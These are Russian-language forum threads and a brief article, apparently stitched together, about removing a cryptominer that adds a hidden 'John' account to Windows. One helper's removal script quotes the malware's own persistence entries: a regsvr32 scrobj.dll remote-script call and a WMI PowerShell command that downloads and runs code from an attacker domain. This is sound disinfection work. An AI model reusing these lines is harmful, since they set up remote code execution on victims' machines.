|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
1 |
|
|
28.12.2021, 22:56. Показов 16242. Ответов 17
Как вы могли догадаться из названия я совершенно случайно обнаружил ещё одного скрытого пользователя своей системы: Имя устройства LAPTOP-SR6R18LC По имени John который обладал правами удалённого доступа. Не долго думая ,удалив его через Выполнить , решил убедиться в своих подозрениях и попал на ваш сайт где описан похожий случай. Решил последовать вашим инструкциям и создать тему по этому поводу. К слову вирус никак себя не выдаёт, процессы не висят. Единственное что при попытке зайти на ваш сайт через браузер Edge — браузер вылетал, уж не знаю связанно это или нет. Сейчас сижу через яндекс. В общем логи приложил. Дайте знать что это и что с этим делать. Я право не в силах бороться на равных с этой электроникой.
0 |
|
Programming Эксперт 94731 / 64177 / 26122 Регистрация: 12.04.2006 Сообщений: 116,782 |
28.12.2021, 22:56 |
|
Ответы с готовыми решениями:
Подскажите вероятный листинг диаграммы Программа, которая позволит ставить вероятный диагноз Найти наиболее вероятный прямоугольник среди множества точек 17 |
Майнер по имени John взломал мой компьютер и я не могу скачать антивирусы|
12791 / 6942 / 1448 Регистрация: 06.09.2009 Сообщений: 25,761 |
|
|
28.12.2021, 23:28 |
2 |
|
Скачайте AV block remover. После перезагрузки системы соберите новый CollectionLog Автологером.
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 00:26 [ТС] |
3 |
|
Я вынужден извиниться, ведь выполнить подобные манипуляции не представляется возможным. Даже при переименовании программа не ставится. Система говорит что там вирус или вредоносная программа и удаляет его.
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 00:50 [ТС] |
4 |
|
—> Миниатюры
0 |
|
12791 / 6942 / 1448 Регистрация: 06.09.2009 Сообщений: 25,761 |
|
|
29.12.2021, 01:22 |
5 |
|
Нет там вируса. Отключите параноидального Защитника Windows хотя бы на время лечения.
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 01:49 [ТС] |
6 |
|
Мой косяк. На 10 винде столько служб по защите появилось что черт ногу сломит , а защиты всё равно ноль.
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 01:51 [ТС] |
7 |
|
—>
0 |
|
12791 / 6942 / 1448 Регистрация: 06.09.2009 Сообщений: 25,761 |
|
|
29.12.2021, 01:54 |
8 |
|
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 02:04 [ТС] |
9 |
|
Готово
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 02:32 [ТС] |
10 |
|
Ну по ощущениям уже что то изменилось. Раньше шумел вентиляторами как вертолёт , а щас вдруг притих. Я думал так и должно быть) Ан нет. Видно что то с торрентов подцепил ещё пару месяцев назад. Ну что за погань….нет чтобы честным пиратством заниматься.) Добавлено через 11 минут
0 |
|
12791 / 6942 / 1448 Регистрация: 06.09.2009 Сообщений: 25,761 |
|
|
29.12.2021, 07:09 |
11 |
|
1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Код Start::
CreateRestorePoint:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ha7455h6fi1.net:280/v1.sct scrobj.dll (Нет файла) <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
WMI:subscription\CommandLineEventConsumer->topk4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.ha7455h6fi1.net:8080/power.txt')||regsvr32 /u /s /i:http://ha7455h6fi1.net:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://wmi.ha7455h6fi1.net:8220/s.xsl"]
Reboot:
End::
2. Запустите Farbar Recovery Scan Tool от имени Алминистратора по правой кнопке мыши.
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 14:25 [ТС] |
12 |
|
Готово
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 14:52 [ТС] |
13 |
|
Откуда пришла эта зараза можно выяснить? И посоветуете антивирус какой?
0 |
|
12791 / 6942 / 1448 Регистрация: 06.09.2009 Сообщений: 25,761 |
|
|
29.12.2021, 19:53 |
14 |
|
Откуда пришла эта зараза можно выяснить? Не представляется возможным, но наверняка с каким-нибудь кряком, кейгеном и т.п. Проблема решена? Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 20:10 [ТС] |
15 |
|
Да, в общем да. Больше не греется и не шумит как последние пару месяцев. Ну можно сказать поработал в стресс режиме. Ничего не сгорело и не отвалилось.Тест прошёл успешно)
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
29.12.2021, 20:24 [ТС] |
16 |
|
Если на этом всё, то хочу от души поблагодарить за вашу оперативную подмогу и знания. Респект администрации сайта и подобным ресурсам за вклад в борьбу со злым умыслом и спасения каждого из людей встретившего проблемы в этой сфере в частности и всего мира в общности.
0 |
|
12791 / 6942 / 1448 Регистрация: 06.09.2009 Сообщений: 25,761 |
|
|
29.12.2021, 22:58 |
17 |
|
——————————- [ Browser ] ——————————- Исправляйте указанное + Рекомендации после удаления вредоносного ПО
0 |
|
0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12 |
|
|
30.12.2021, 01:26 [ТС] |
18 |
|
Спасибо вам.. Всех благ и всего самого наилучшего в новом году. С наступающим.
0 |
|
IT_Exp Эксперт 87844 / 49110 / 22898 Регистрация: 17.06.2006 Сообщений: 92,604 |
30.12.2021, 01:26 |
|
Помогаю со студенческими работами здесь Вирус пользователь john Скрытый пользователь John
Система перестала загружаться появился пользователь john Папка с неизвестным пользователем John и вирус шифровальщик
Задача «John, Bruce and beer» Искать еще темы с ответами Или воспользуйтесь поиском по форуму: 18 |
#1
olker
-
- Posters
- 4 Сообщений:
Newbie
Отправлено 05 Август 2022 — 10:16
Заметил вирус благодаря тому, что с метамаска списался эфириум на 15$ — всё что было на кошельке. В хроме появились расширения загруженные с компьютера, но не мной. Подозрительные процессы в автозагрузке. Появление второй учётное записи «John» с паролем и нет доступа к папкам с названиями антивирусов, что собственно не даёт ими воспользоваться.
Cureit нашёл следующее:
AdwClearner:
Malwarbytes — установить получается но нет доступа к этой папке с моей учётки.
Логи которые получилось зафиксировать по инструкции:
https://disk.yandex.ru/d/edrLrPJE39NycA
Подозрительные процессы в автозагрузке:
Расширения в хроме загруженные с компьютера, но не мной. (savematic, gifty box) — маскируются под сервисы кэшбэка.
Посмотрел кучу видео, почистил папки temp (ещё не наткнулся на данный форум к этому моменту). Что делать дальше — пока ума не приложу. Надеюсь сможете хоть чем-нибудь помочь, буду очень благодарен.
- Наверх
#2
Dr.Robot
Dr.Robot
-
- Helpers
- 3 023 Сообщений:
Poster
Отправлено 05 Август 2022 — 10:16
1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,
Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ — сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.
2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,
— попытайтесь найти коды разблокировки здесь https://www.drweb.com/xperf/unlocker/
— детально опишите как выглядит это окно (цвет, текст, количество кнопок, появляется ли оно до появления окна приветствия Windows или сразу же после включении компьютера);
— дождаться ответа аналитика или хелпера;
3. Если у Вас зашифрованы файлы,
Внимание! Услуга по расшифровке файлов предоставляется только лицензионным пользователям продуктов Dr.Web, у которых на момент заражения была установлена коммерческая лицензия Dr.Web Security Space не ниже версии 9.0, Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite не ниже версии 6.0. подробнее.
Что НЕ нужно делать:
— лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
— переустанавливать операционную систему;
— менять расширение у зашифрованных файлов;
— очищать папки с временными файлами, а также историю браузера;
— использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из «Аптечки сисадмина» Dr. Web;
— использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.
Что необходимо сделать:
— прислать в вирусную лабораторию Dr. Web https://support.drweb.com/new/free_unlocker/?keyno=&for_decode=1 несколько зашифрованных файлов и, если есть, их не зашифрованные копии в категорию Запрос на лечение. Дожидаться ответа на Вашу почту вирусного аналитика и далее следовать его указаниям ведя с ним переписку по почте. На форуме рекомендуется указать номер тикета вирлаба — это номер Вашего запроса, содержащий строку вида [drweb.com #3219200];
4. При возникновении проблем с интернетом, таких как «не открываются сайты», в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа «Содержание сайта заблокировано» и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig
Для этого проделайте следующее:
- Зайдите в меню Пуск на Рабочем столе, вызовите в нем окно команды Выполнить…
- В появившемся окне наберите cmd и нажмите клавишу <Enter>. Появится черное окно консоли (интерпретатора команд).
- Напишите в этом черном окне команду ipconfig /all>»%userprofile%\ipc.log» и нажмите клавишу <Enter>, затем наберите там же команду explorer.exe /select,»%userprofile%\ipc.log» и нажмите клавишу <Enter>, нужный файл будет показан в Проводнике Windows.
- Приложите этот файл к своему сообщению на форуме.
Чтобы не сделать ошибок в написании команд, можно скопировать эти команды отсюда и последовательно вставлять в черное окно консоли путем выбора пункта Вставить из меню, появляющегося при нажатии правой кнопки мыши в черном окне консоли.
- Наверх
#3
Dmitry_rus
Dmitry_rus
-
- Helpers
- 3 528 Сообщений:
Guru
Отправлено 05 Август 2022 — 10:28
Rdpwrapper? Удаленный раб. стол (RDP) не используете?
- Наверх
#4
olker
olker
-
- Posters
- 4 Сообщений:
Newbie
Отправлено 05 Август 2022 — 11:22
Rdpwrapper? Удаленный раб. стол (RDP) не используете?
Нет, не использовал
- Наверх
#5
Ivan Susloparov
Ivan Susloparov
-
- Virus Analysts
-
- 163 Сообщений:
Member
Отправлено 05 Август 2022 — 13:54
Воспользуйтесь утилитой для повторного сбора логов: https://drw.sh/fnlurr
- Наверх
#6
B.Chugunov
B.Chugunov
-
- Dr.Web Staff
-
- 559 Сообщений:
Advanced Member
Отправлено 05 Август 2022 — 22:09
Вирус создал вторую учётную запись «John», предполагаю что это майнер
Знаю я одного Джона, тоже предполагаю, что он майнер. 
P.S. сори на оффтоп
По сабжу, нужен отчет fixit.
——————
best regards,
Technical support department, Doctor Web, Ltd.
- Наверх
#7
NickM
NickM
-
- Posters
- 171 Сообщений:
Member
Отправлено 06 Август 2022 — 21:24
Хмм, зарезали пост указанием ссылок на ресурсы помощи, а человек походу и продолжает мучаться (или успел прочитать и «пролечился»)..
- Наверх
#8
olker
olker
-
- Posters
- 4 Сообщений:
Newbie
Отправлено 07 Август 2022 — 18:32
Хмм, зарезали пост указанием ссылок на ресурсы помощи, а человек походу и продолжает мучаться (или успел прочитать и «пролечился»)..
Нет, к счастью проблему решил с помощью очень крутых ребят с компьютерного форума. Если что могу дать ссылку в лс.
- Наверх
#9
NickM
NickM
-
- Posters
- 171 Сообщений:
Member
Отправлено 07 Август 2022 — 19:23
Если что могу дать ссылку в лс.
Незачем;
Нет, к счастью проблему решил с помощью очень крутых ребят с компьютерного форума.
Тогда у Вас всё хорошо 
- Наверх
#10
ummate
ummate
-
- Members
- 1 Сообщений:
Newbie
Отправлено 19 Август 2022 — 15:35
у меня жена наустанавливала игр от Алавара, теперь на всех ПК этот John учетка появилась, подскажите что делать как лечить?
Сообщение было изменено ummate: 19 Август 2022 — 15:35
- Наверх
#11
Ivan Susloparov
Ivan Susloparov
-
- Virus Analysts
-
- 163 Сообщений:
Member
Отправлено 19 Август 2022 — 17:04
у меня жена наустанавливала игр от Алавара, теперь на всех ПК этот John учетка появилась, подскажите что делать как лечить?
В первую очередь создайте отдельную тему для данного случая. В ней прикрепите отчеты, созданные данной утилитой ( https://drw.sh/xseqpa), со ссылкой на яндекс/гугл диск
- Наверх
От
Ross
Здравствуйте, решил скачать кряк для Adobe Lightroom, после его установки и «патча» Каспер через несколько минут заругался и нашёл 2 вируса PDM:Trojan.Win32.Bazon.a, так же PDM:Trojan.Win32.Generic, один из них он определил как Майнер, на диске С появилась папка Google/Chrome/updater.exe на этот ‘updater’ он и ругался
кряк я удалил(Adobe GenP 3.0), Каспер начал их удалять, всё получилось в отчётах написано что Generic и Bazon удалены, после этого начал полное сканирование, иногда оно останавливалось на 50 потом на 70 и 90%, но потом продолжал сканирование, это меня смутило, вдруг что-то мог пропустить? Могут ли эти трояны вернуться или как либо подгружаться в систему даже после удаления Каспером? и есть ли возможность полностью проверить систему на отсутствие этих гадов в системе?? Так-же в момент поражения пк этими зловредами в нем находилась флешка, очень важная для работы! Могли ли они как-то перекочевать на нее? Каспером её тоже проверил, он пишет что угроз нет! Прикрепляю отчет мониторинга и отчет Полного сканирования после удаления троянов! Заранее спасибо)
отчёт мониторинга.txt
полная проверка каспер(после удаления).txt
Зачастую бывает нужно удалить пользователя John в учетной записи Windows. Это может быть связано с тем, что данная учетная запись не используется, или же ее нужно удалить по другой причине. В данной статье мы расскажем, как удалить пользователя John в netplwiz.
Шаг 1: Запустите командную строку
Для начала необходимо запустить командную строку. Для этого откройте меню «Пуск» и в строке поиска введите «cmd». Выберите «Командная строка» и нажмите правую кнопку мыши. В открывшемся меню выберите «Запуск от имени администратора».
Шаг 2: Откройте netplwiz
Чтобы удалить пользователя John в netplwiz, нужно открыть соответствующее приложение. Для этого введите команду «netplwiz» в командной строке и нажмите Enter.
Шаг 3: Выберите пользователя John
В открывшемся окне выберите вкладку «Пользователи». Найдите пользователя John в списке аккаунтов и выберите его.
Шаг 4: Удалите пользователя John
Нажмите на кнопку «Удалить», расположенную внизу окна. Подтвердите свое намерение удалить пользователя John.
Шаг 5: Перезапустите компьютер
Чтобы изменения вступили в силу, необходимо перезапустить компьютер. Для этого откройте меню «Пуск», выберите «Выключение компьютера» и нажмите «Перезагрузить».
После перезагрузки компьютера пользователь John будет удален из системы. Вы можете перейти в «Параметры учетной записи» для проверки, что учетная запись John больше не присутствует в списке аккаунтов.
Вывод
Удаление пользователя John в netplwiz оказалось довольно простым процессом. Следуйте нашим инструкциям и вам удастся выполнить данное действие без проблем. Не забудьте перезапустить компьютер, чтобы изменения вступили в силу.
Воин Моргота, конечно уже много времени прошло, но всё-же и я поздно наткнулся на данную тему, и то, потому что сам столкнулся с такой же проблемой. В итоге скажу, что это вирус-майнер, и не простой, а создаёт с помощью этого скрытого аккаунта удалённое rdp-подключение, блокирует доступ на сайты антивирусного ПО и блокирует запуск любых антивирусных утилит, типа доктор веб, kvrt и т.д. Селится он в скрытых системных папках, зайти на них тоже не даст.
Как бороться: либо скачать на флешку с другого компа утилиту AVbr и KVRT, переименовать их, например 123 и 321 и после запустить сначала AVbr (она удалит скрытых пользователей и восстановит права на папки системные и т.д….) ну а KVRT подчистит остатки и хвосты от вируса. Ну либо переустановка ОС с полным форматированием диска (не быстрое а полное). Я не стал форматировать диск и менять ОС, всё успешно вылечилось. Расписывать долго, но скажу коротко, мучался весь день, про AVbr утилиту узнал только после, в итоге вручную в безопасном режиме рылся в папках, удалял все странные файлы. У меня от шкерился под процесс RealtekHD (звуковой карты). Также вручную удалил все exe-шники с автозапуска (скрытые) и тд…
Теперь самое главное — подцепил с репака от Chovka и FitGirl (качал игру Cities Skyline градостроительный симулятор). Пренебрёг оповещением антивируса (добавил файлы в исключения) и тут понеслось… Также будьте аккуратны с репаками от Evgeny98. Вообще лучше всего репаки от Механиков, там точно нет майнеров, да и сама контора себя зарекомендовала положительно. С любыми репаками — ухо востро.